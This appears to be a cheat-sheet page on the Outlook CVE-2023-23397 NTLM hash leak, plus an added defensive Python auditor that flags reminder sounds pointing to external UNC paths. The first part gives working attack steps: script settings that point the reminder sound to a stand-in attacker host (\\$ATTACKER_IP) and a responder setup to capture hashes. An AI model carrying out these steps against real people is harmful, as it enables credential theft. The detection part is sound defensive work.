Outlook Exploits
CVE-2023-23397
Create an appointment with a custom, malicious reminder sound. The sound file is referenced by a Universal Naming Convention (UNC) path and is stored on a server controlled by the attacker. The goal is to obtain the NTLM(v2) hashes. No interaction by the target is needed.
Therefore, PidLidReminderFileParameter has to be altered to contain the UNC path, for example \\$ATTACKER_IP:$ATTACKER_PORT\payload.wav. The file may be served over SMB or WebDAV.
Further, PidLidReminderOverride has to be set to true.
Usage
New Appointment --> set Reminder to 0 minutes.
The OutlookSpy plugin is needed. Go to the OutlookSpy tab, press CurrentItem and go to Script.
Set the following variables:
AppointmentItem.ReminderOverrideDefault = true
AppointmentItem.ReminderPlaySound = true
AppointmentItem.ReminderSoundFile = "\\$ATTACKER_IP\payloads\alert.wav"
- Set up responder -I <interface> to catch the NTLM hash.
Press Run to save the variables. Send the appointment afterwards.
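
From the defender's side, the two properties described above are what to look for in stored items. The following is an added example, not part of the original page: it grades already-exported PidLidReminderFileParameter and PidLidReminderOverride values. The dict keys, the internal network and suffix lists, and the sample items are constructed assumptions.

```python
import ipaddress
import re

# \\host\share, \\host@port\share (WebDAV form), \\?\UNC\host\share; '/' is normalised first.
UNC_RE = re.compile(r'^\\\\(?:\?\\UNC\\)?(?P<host>[A-Za-z0-9][\w.\-]*)(?P<dav>@[^\\]+)?\\', re.I)

def unc_host(path):
    """Return (host, is_webdav_form) for a UNC path, or None for local/relative paths."""
    m = UNC_RE.match((path or '').strip().replace('/', '\\'))
    return (m.group('host').lower(), m.group('dav') is not None) if m else None

def is_external(host, internal_nets, internal_suffixes):
    """Assumption: single-label names and the listed nets/suffixes count as internal."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        if '.' not in host:
            return False
        return not any(host == s or host.endswith('.' + s) for s in internal_suffixes)
    return not any(ip in net for net in internal_nets)

def audit_item(item, internal_nets, internal_suffixes):
    """Grade one item from its PidLidReminderFileParameter / PidLidReminderOverride values."""
    parsed = unc_host(item.get('reminder_file'))
    if parsed is None:
        return 'ok', 'reminder sound is not a UNC path'
    host, webdav = parsed
    where = f"{host} ({'WebDAV' if webdav else 'SMB'} form)"
    if not is_external(host, internal_nets, internal_suffixes):
        return 'low', f'UNC reminder sound on internal host {where}'
    # Per the text above, PidLidReminderOverride must be true for the custom sound to be used.
    severity = 'high' if item.get('reminder_override') else 'medium'
    return severity, f'UNC reminder sound on external host {where}'

# Constructed sample data; the dict keys are hypothetical names for exported property values.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ('10.0.0.0/8', '172.16.0.0/12', '192.168.0.0/16')]
INTERNAL_SUFFIXES = ['corp.example']
SAMPLE_ITEMS = [
    {'id': 'A1', 'reminder_override': True, 'reminder_file': r'\\203.0.113.5\payloads\alert.wav'},
    {'id': 'A2', 'reminder_override': True, 'reminder_file': r'\\files.corp.example\sounds\ding.wav'},
    {'id': 'A3', 'reminder_override': False, 'reminder_file': r'C:\Windows\Media\reminder.wav'},
    {'id': 'A4', 'reminder_override': True, 'reminder_file': r'\\host.example.net@8080\x\a.wav'},
]

def audit_all(items=SAMPLE_ITEMS):
    return {i['id']: audit_item(i, INTERNAL_NETS, INTERNAL_SUFFIXES)[0] for i in items}

if __name__ == '__main__':
    print(audit_all())
```

Items graded high or medium are the ones to review first; low still deserves a look, since a reminder sound rarely needs to live on a network share.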